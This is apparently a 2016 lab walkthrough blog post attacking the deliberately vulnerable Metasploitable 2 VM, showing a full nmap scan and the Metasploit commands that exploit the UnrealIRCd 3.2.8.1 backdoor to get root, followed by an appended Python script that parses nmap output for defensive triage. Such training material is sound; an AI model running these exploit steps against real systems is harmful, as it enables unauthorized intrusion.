Friday, 5 August 2016

Breaking into Metasploitable, part 4

We continue the series dedicated to Metasploitable 2, which, as we said before, is a distribution packed with vulnerabilities so that you can practise your penetration tests on it.

nmap -sS -A 192.168.1.131

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-01 11:43 CEST
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:43
Completed NSE at 11:43, 0.00s elapsed
Initiating NSE at 11:43
Completed NSE at 11:43, 0.00s elapsed
Initiating ARP Ping Scan at 11:43
Scanning 192.168.1.131 [1 port]
Completed ARP Ping Scan at 11:43, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:43
Completed Parallel DNS resolution of 1 host. at 11:43, 0.15s elapsed
Initiating SYN Stealth Scan at 11:43
Scanning 192.168.1.131 [1000 ports]
Discovered open port 21/tcp on 192.168.1.131
Discovered open port 139/tcp on 192.168.1.131
Discovered open port 111/tcp on 192.168.1.131
Discovered open port 5900/tcp on 192.168.1.131
Discovered open port 22/tcp on 192.168.1.131
Discovered open port 445/tcp on 192.168.1.131
Discovered open port 80/tcp on 192.168.1.131
Discovered open port 25/tcp on 192.168.1.131
Discovered open port 23/tcp on 192.168.1.131
Discovered open port 53/tcp on 192.168.1.131
Discovered open port 3306/tcp on 192.168.1.131
Discovered open port 8009/tcp on 192.168.1.131
Discovered open port 2049/tcp on 192.168.1.131
Discovered open port 1524/tcp on 192.168.1.131
Discovered open port 512/tcp on 192.168.1.131
Discovered open port 6667/tcp on 192.168.1.131
Discovered open port 6000/tcp on 192.168.1.131
Discovered open port 513/tcp on 192.168.1.131
Discovered open port 8180/tcp on 192.168.1.131
Discovered open port 2121/tcp on 192.168.1.131
Discovered open port 514/tcp on 192.168.1.131
Discovered open port 5432/tcp on 192.168.1.131
Discovered open port 1099/tcp on 192.168.1.131
Completed SYN Stealth Scan at 11:43, 0.15s elapsed (1000 total ports)
Initiating Service scan at 11:43
Scanning 23 services on 192.168.1.131
Completed Service scan at 11:43, 11.31s elapsed (23 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.131
NSE: Script scanning 192.168.1.131.
Initiating NSE at 11:43
Completed NSE at 11:44, 14.52s elapsed
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Nmap scan report for 192.168.1.131
Host is up (0.00059s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after:  2010-04-16T14:07:45
| MD5:   dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: 2016-07-01T09:43:21+00:00; -35s from scanner time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41183/tcp  mountd
|   100005  1,2,3      49986/udp  mountd
|   100021  1,3,4      41855/udp  nlockmgr
|   100021  1,3,4      54128/tcp  nlockmgr
|   100024  1          42483/tcp  status
|_  100024  1          49051/udp  status
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  rmiregistry GNU Classpath grmiregistry
|_rmi-dumpregistry: Registry listing failed (No return data received from server)
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41183/tcp  mountd
|   100005  1,2,3      49986/udp  mountd
|   100021  1,3,4      41855/udp  nlockmgr
|   100021  1,3,4      54128/tcp  nlockmgr
|   100024  1          42483/tcp  status
|_  100024  1          49051/udp  status
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: SupportsTransactions, Support41Auth, SupportsCompression, SwitchToSSLAfterHandshake, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew
|   Status: Autocommit
|_  Salt: 7HD[!-`|m0EJ$q2@-^sH
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    Unknown security type (33554432)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
| irc-info: 
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 0:04:04
|   source ident: nmap
|   source host: 5AD5FCE2.78DED367.FFFA6D49.IP
|_  error: Closing Link: gjtkunzrr[192.168.1.134] (Quit: gjtkunzrr)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:67:3E:A2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 497.102 days (since Fri Feb 20 08:16:41 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=202 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   METASPLOITABLE<00>   Flags: <unique><active>
|   METASPLOITABLE<03>   Flags: <unique><active>
|   METASPLOITABLE<20>   Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2016-07-01T05:43:21-04:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.59 ms 192.168.1.131

NSE: Script Post-scanning.
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.64 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.430KB)

If we look closely, there is an Unreal IRC daemon on port 6667. IRC is a chat protocol that was used heavily in the past, although even today there are still quite a few people who use it.

Let's search in Metasploit to see whether we have an exploit for it...

search unreal

Ah, we do.

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOST 192.168.1.131

Let's look for the payloads available for this exploit:

show payloads

We have a few to choose from.

We configure it, type exploit and ...

Ah, and on top of that, we are root.
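As an added example that is not part of the original post, here is a small Python parser for the nmap "normal" output port table shown above. It extracts port, state, service and version (attaching NSE script lines to their port) and applies a few triage rules a defender would use on this scan: anonymous FTP, cleartext remote-access services, the root shell listener on 1524, and the UnrealIRCd 3.2.8.1 build that the Metasploit module above targets. The sample input is a constructed excerpt of the scan; the rule set is an assumption for illustration.

```python
import re
# Constructed excerpt of the nmap "normal" output shown above (not the full scan).
SAMPLE_SCAN = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
512/tcp  open  exec        netkit-rsh rexecd
1524/tcp open  shell       Metasploitable root shell
6667/tcp open  irc         Unreal ircd
| irc-info: 
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
"""

# One port-table row: "<port>/<proto>  <state>  <service>  <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

def parse_ports(text):
    """Return one dict per port row; NSE lines ('|' prefix) attach to the last row."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                          "service": m.group(4), "version": m.group(5).strip(), "scripts": []})
        elif line.startswith("|") and ports:
            ports[-1]["scripts"].append(line.lstrip("|_ ").rstrip())
    return ports

# Assumed triage rules for the asset owner: (predicate over a parsed port, finding text).
RULES = [
    (lambda p: any("Anonymous FTP login allowed" in s for s in p["scripts"]), "anonymous FTP enabled"),
    (lambda p: p["service"] in ("telnet", "exec", "login"), "cleartext remote-access service"),
    (lambda p: "root shell" in p["version"], "unauthenticated root shell listener"),
    (lambda p: p["service"] == "irc" and any("Unreal3.2.8.1" in s for s in p["scripts"]),
     "UnrealIRCd 3.2.8.1, the backdoored release"),
]

def findings(text):
    """Map (port, proto) -> list of finding texts for open ports that match a rule."""
    out = {}
    for p in parse_ports(text):
        if p["state"] != "open":
            continue
        hits = [msg for pred, msg in RULES if pred(p)]
        if hits:
            out[(p["port"], p["proto"])] = hits
    return out
```

Run `findings(SAMPLE_SCAN)` (or feed it a whole `nmap -A` report saved with `-oN`) to get the open ports that need remediation first.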
